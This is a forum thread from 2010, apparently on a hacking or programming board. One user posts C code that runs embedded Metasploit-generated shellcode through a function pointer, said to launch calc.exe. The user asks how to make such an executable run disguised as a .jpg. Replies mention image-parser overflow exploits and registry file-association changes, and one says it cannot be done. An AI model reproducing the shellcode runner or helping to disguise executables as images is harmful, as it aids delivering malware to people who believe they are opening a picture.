.

runing .exe as .jpg c source code

<<

johnacandy

Newbie
Newbie

Posts: 10

Joined: Fri Apr 02, 2010 6:27 pm

Post Sat Apr 03, 2010 8:56 am

runing .exe as .jpg c source code

Hi guys there was a previous post on these forums using the code to launch calculator.exe which i have posted below . Now the file that is generated is an .exe file . How can i rename that .exe to .jpg and still cause the shell code to execute. I know by changing the extension to say.jpg the asscoiated application starts running that file and for an .exe file to launch the presence of exe is necesaary in the extension. My question is how can i cause a code to run from a non exe file. Any hint or samples would greatly be appreciated. Another member here had posted a code which generated a .jpg file .but that didnt work any ideas again would be appreciated

#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int  main()
{
void (*shell)(); // Function pointer.
       shell = (void(*)()) (&shellCode);

printf("Shellcode at: %p\n", shellCode);
printf("Function pointer points to: %p\n", shell);

// Run it!
       printf("Running shellcode...\n");
shell();

       return 0;
}
Last edited by johnacandy on Sat Apr 03, 2010 8:58 am, edited 1 time in total.
<<

zeroflaw

User avatar

Full Member
Full Member

Posts: 208

Joined: Fri Feb 12, 2010 10:41 am

Location: Holland, Den Helder

Post Sun Apr 04, 2010 2:02 pm

Re: runing .exe as .jpg c source code

You have to find an exploit in the way jpegs get processed and use the shellcode as payload for the overflow. I don't think its possible to run code from anything other than an executable without exploiting (overflowing a buffer) or something.

I know there used to be an old exploit for windows that would allow code execution. They patched it ages ago.
ZF
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sun Apr 04, 2010 8:27 pm

Re: runing .exe as .jpg c source code

I think that there was also a way to modify the registry CLASSES section to mark JPG as executable.  I don't remember how to do it, but I remember reading about it.  You would obviously need to be able to modify the user's registry.
~~~~~~~~~~~~~~
Ketchup
<<

johnacandy

Newbie
Newbie

Posts: 10

Joined: Fri Apr 02, 2010 6:27 pm

Post Mon Apr 05, 2010 1:42 am

Re: runing .exe as .jpg c source code

@Ketchup ...
What you are referring to is I believe the Assoc command in Dos which basically associates file types to actions. Then again the problem is same how could we execute shell commands through image files??
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Mon Apr 05, 2010 5:27 am

Re: runing .exe as .jpg c source code

As I said before, you can't. Unless you renamed the extension to scr or something. The closest thing you can get to is changing the thumbnail image or something. jpg is data and will only be interpreted as data by an associated file viewer.. Unless you find vuln in file viewer, you cannot execute that code.

You are bashing your head against a brick wall here. Good to be proved wrong though :)

Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software